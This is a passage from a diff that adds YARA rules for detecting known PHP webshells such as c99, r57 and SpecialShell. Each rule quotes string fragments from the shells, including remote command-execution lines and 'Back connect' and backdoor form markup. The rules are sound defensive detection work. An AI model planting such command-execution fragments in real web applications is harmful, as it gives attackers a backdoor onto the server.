+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<title>Ru24PostWebShell - \".$_POST['cmd'].\"</title>" fullword
+      $s3 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a" 
+      $s4 = "Writed by DreAmeRz" fullword
+   condition: 
+      1 of them
+}
+
+rule Webshell_DTool_Pro_php_RID2FBF : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file DTool Pro.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:10:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "r3v3ng4ns\\nDigite" 
+      $s1 = "if(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: It seems that the permissi" 
+      $s3 = "if (empty($cmd) and $ch_msg==\"\") echo (\"Comandos Exclusivos do DTool Pro\\n" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_php_include_w_shell_php_RID3425 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file php-include-w-shell.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 15:18:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$dataout .= \"<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incd" 
+      $s1 = "if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php_RID3D04 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 21:36:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Safe0ver" fullword
+      $s1 = "Script Gecisi Tamamlayamadi!" 
+      $s2 = "document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_shell_php_php_RID300C : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file shell.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:23:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "/* We have found the parent dir. We must be carefull if the parent " fullword
+      $s2 = "$tmpfile = tempnam('/tmp', 'phpshell');" 
+      $s3 = "if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {" fullword
+   condition: 
+      1 of them
+}
+
+rule Webshell_MySQL_Web_Interface_Version_0_8_php_RID37DB : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file MySQL Web Interface Version 0.8.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 17:56:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "SooMin Kim" 
+      $s1 = "http://popeye.snu.ac.kr/~smkim/mysql" 
+      $s2 = "href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename" 
+      $s3 = "<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofi" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_simple_cmd_html_RID30D7 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - file simple_cmd.html.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:57:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<title>G-Security Webshell</title>" fullword
+      $s2 = "<input type=TEXT name=\"-cmd\" size=64 value=\"<?=$cmd?>\" " fullword
+      $s3 = "<? if($cmd != \"\") print Shell_Exec($cmd);?>" fullword
+      $s4 = "<? $cmd = $_REQUEST[\"-cmd\"];?>" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell__1_c2007_php_php_c100_php_RID3309 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files 1.txt, c2007.php.php.txt, c100.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 14:30:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d089e7168373a0634e1ac18c0ee00085"
+      hash2 = "38fd7e45f9c11a37463c3ded1c76af4c"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "echo \"<b>Changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\"" 
+      $s3 = "echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_nst_perl_proxy_shell_RID3325 : DEMO HKTL SCRIPT T1090 T1100 T1105 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files nst.php.php.txt, img.php.php.txt, nstview.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 14:35:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "17a07bb84e137b8aa60f87cd6bfab748"
+      hash2 = "4745d510fed4378e4b1730f56f25e569"
+      tags = "DEMO, HKTL, SCRIPT, T1090, T1100, T1105, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><i" 
+      $s1 = "$perl_proxy_scp = \"IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4v" 
+      $s2 = "<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_network_php_xinfo_RID31DA : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files network.php.php.txt, xinfo.php.php.txt, nfm.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 13:40:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2601b6fc1579f263d2f3960ce775df70"
+      hash2 = "401fbae5f10283051c39e640b77e4c26"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = ".textbox { background: White; border: 1px #000000 solid; color: #000099; font-fa" 
+      $s2 = "<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''" 
+   condition: 
+      all of them
+}
+
+rule Webshell_SpecialShell_99_php_php_RID337E : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 14:50:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3ca5886cd54d495dc95793579611f59a"
+      hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+      hash3 = "09609851caa129e40b0d56e90dfc476c"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "echo \"<hr size=\\\"1\\\" noshade><b>Done!</b><br>Total time (secs.): \".$ft" 
+      $s3 = "$fqb_log .= \"\\r\\n------------------------------------------\\r\\nDone!\\r" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_r577_php_php_SnIpEr_2_RID322A : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 13:53:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "911195a9b7c010f61b66439d9048f400"
+      hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+      hash3 = "8023394542cddf8aee5dec6072ed02b5"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "'eng_text71'=>\"Second commands param is:\\r\\n- for CHOWN - name of new owner o" 
+      $s4 = "if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_c99shell_v1_0_RID2F28 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, ctt_sh.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:45:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
+      hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+      hash3 = "671cad517edd254352fe7e0c7c981c39"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "\"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze\"" 
+      $s2 = "\"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm\"" 
+      $s4 = "\"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo\"" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_r577_php_spy_RID2F1D : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files r577.php.php.txt, spy.php.php.txt, s.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:43:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "eed14de3907c9aa2550d95550d1a2d5f"
+      hash2 = "817671e1bdc85e04cc3440bbd9288800"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_POST['" 
+      $s3 = "echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db>" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_c99_generic_RID2EB7 : DEMO GEN T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated "
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:26:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3ca5886cd54d495dc95793579611f59a"
+      hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+      hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+      tags = "DEMO, GEN, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "  if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\"" 
+      $s1 = "  if (file_exists($mkfile)) {echo \"<b>Make File \\\"\".htmlspecialchars($mkfile" 
+      $s2 = "  echo \"<center><b>MySQL \".mysql_get_server_info().\" (proto v.\".mysql_get_pr" 
+      $s3 = "  elseif (!fopen($mkfile,\"w\")) {echo \"<b>Make File \\\"\".htmlspecialchars($m" 
+   condition: 
+      all of them
+}
+
+rule Webshell_SpecialShell_99a_RID3091 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated "
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:45:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3ca5886cd54d495dc95793579611f59a"
+      hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+      hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$sess_data[\"cut\"] = array(); c99_s" 
+      $s3 = "if ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_SpecialShell_99b_RID3092 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files w.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:45:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9c5bb5e3a46ec28039e8986324e42792"
+      hash2 = "09609851caa129e40b0d56e90dfc476c"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "\"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur" 
+      $s2 = "c99sh_sqlquery" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_SpecialShell_99c_RID3093 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:45:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3ca5886cd54d495dc95793579611f59a"
+      hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+      hash3 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "else {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPA" 
+      $s3 = "else {echo \"<b>File \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_r577_php_php_SnIpEr_3_RID322B : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 13:53:41"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "911195a9b7c010f61b66439d9048f400"
+      hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+      hash3 = "eed14de3907c9aa2550d95550d1a2d5f"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "echo sr(15,\"<b>\".$lang[$language.'_text" 
+      $s1 = ".$arrow.\"</b>\",in('text','" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_r577_php_php_SnIpEr_RID3199 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 13:29:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "911195a9b7c010f61b66439d9048f400"
+      hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash'," fullword
+      $s1 = "$name='ec371748dc2da624b35a4f8f685dd122'" 
+      $s2 = "rst.void.ru" 
+   condition: 
+      3 of them
+}
+
+rule Webshell_Spy_r57_RID2D1F : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files r577.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 10:18:21"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8023394542cddf8aee5dec6072ed02b5"
+      hash2 = "eed14de3907c9aa2550d95550d1a2d5f"
+      hash3 = "817671e1bdc85e04cc3440bbd9288800"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "echo ws(2).$lb.\" <a" 
+      $s1 = "$sql = \"LOAD DATA INFILE \\\"\".$_POST['test3_file']" 
+      $s3 = "if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?(\"dir\"):(\"l" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_SpecialShell_99_php_php_c100_php_RID3678 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 16:57:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "44542e5c3e9790815c49d5f9beffbbf2"
+      hash2 = "09609851caa129e40b0d56e90dfc476c"
+      hash3 = "38fd7e45f9c11a37463c3ded1c76af4c"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "if(eregi(\"./shbd $por\",$scan))" 
+      $s1 = "$_POST['backconnectip']" 
+      $s2 = "$_POST['backcconnmsg']" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_r577_php_RID2D62 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files r577.php.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 10:29:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+      hash2 = "8023394542cddf8aee5dec6072ed02b5"
+      hash3 = "eed14de3907c9aa2550d95550d1a2d5f"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "if(rmdir($_POST['mk_name']))" 
+      $s2 = "$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td>" 
+      $s3 = "if(unlink($_POST['mk_name'])) echo \"<table width=100% cellpadding=0 cell" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_SpecialShell_99_php_c_RID3299 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files w.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 14:12:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9c5bb5e3a46ec28039e8986324e42792"
+      hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+      hash3 = "09609851caa129e40b0d56e90dfc476c"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mvi" 
+      $s1 = "echo \"<b>Execute file:</b><form action=\\\"\".$surl.\"\\\" method=POST><inpu" 
+      $s2 = "\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswd" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_multiple_php_webshells_RID33E1 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files multiple_php_webshells"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 15:06:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "911195a9b7c010f61b66439d9048f400"
+      hash2 = "be0f67f3e995517d18859ed57b4b4389"
+      hash3 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI" 
+      $s2 = "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0" 
+      $s4 = "A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_c99madshell_v2_RID2FCC : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:12:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3ca5886cd54d495dc95793579611f59a"
+      hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<b>Dumped! Dump has been writed to " 
+      $s1 = "if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<TABLE st" 
+      $s2 = "<input type=submit name=actarcbuff value=\\\"Pack buffer to archive" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_c99madshell_v2_1_RID305C : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:36:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3ca5886cd54d495dc95793579611f59a"
+      hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+      hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "@ini_set(\"highlight" fullword
+      $s1 = "echo \"<b>Result of execution this PHP-code</b>:<br>\";" fullword
+      $s2 = "{$row[] = \"<b>Owner/Group</b>\";}" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_GFS_web_shell_ver_3_1_7_RID32FE : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files GFS web-shell ver 3.1.7 - PRiV8.php.txt, nshell.php.php.txt, gfs_sh.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 14:28:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4a44d82da21438e32d4f514ab35c26b6"
+      hash2 = "f618f41f7ebeb5e5076986a66593afd1"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "echo $uname.\"</font><br><b>\";" fullword
+      $s3 = "while(!feof($f)) { $res.=fread($f,1024); }" fullword
+      $s4 = "echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_c99shell_v1_0_99_RID2FF9 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, SpecialShell_99.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:20:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3ca5886cd54d495dc95793579611f59a"
+      hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+      hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "c99ftpbrutecheck" 
+      $s1 = "$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);" fullword
+      $s2 = "$fqb_lenght = $nixpwdperpage;" fullword
+      $s3 = "$sock = @ftp_connect($host,$port,$timeout);" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_SpecialShell_99d_RID3094 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files w.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:45:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9c5bb5e3a46ec28039e8986324e42792"
+      hash2 = "d8ae5819a0a2349ec552cbcf3a62c975"
+      hash3 = "9e9ae0332ada9c3797d6cee92c2ede62"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$sqlquicklaunch[] = array(\"" 
+      $s1 = "else {echo \"<center><b>File does not exists (\".htmlspecialchars($d.$f).\")!<" 
+   condition: 
+      all of them
+}
+
+rule Webshell_Fatalshell_php_RID304D : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files antichat.php.php.txt, Fatalshell.php.php.txt, a_gedit.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:34:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b15583f4eaad10a25ef53ab451a4a26d"
+      hash2 = "ab9c6b24ca15f4a1b7086cad78ff0f78"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "if(@$_POST['save'])writef($file,$_POST['data']);" fullword
+      $s1 = "if($action==\"phpeval\"){" fullword
+      $s2 = "$uploadfile = $dirupload.\"/\".$_POST['filename'];" fullword
+      $s3 = "$dir=getcwd().\"/\";" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_c99shell_v1_0_SsEs_RID3105 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 13:04:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
+      hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "if (!empty($delerr)) {echo \"<b>Deleting with errors:</b><br>\".$delerr;}" fullword
+   condition: 
+      1 of them
+}
+
+rule Webshell_Crystal_php_nshell_RID3214 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files Crystal.php.txt, nshell.php.php.txt, load_shell.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 13:49:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4a44d82da21438e32d4f514ab35c26b6"
+      hash2 = "0c5d227f4aa76785e4760cdcff78a661"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "if ($filename != \".\" and $filename != \"..\"){" fullword
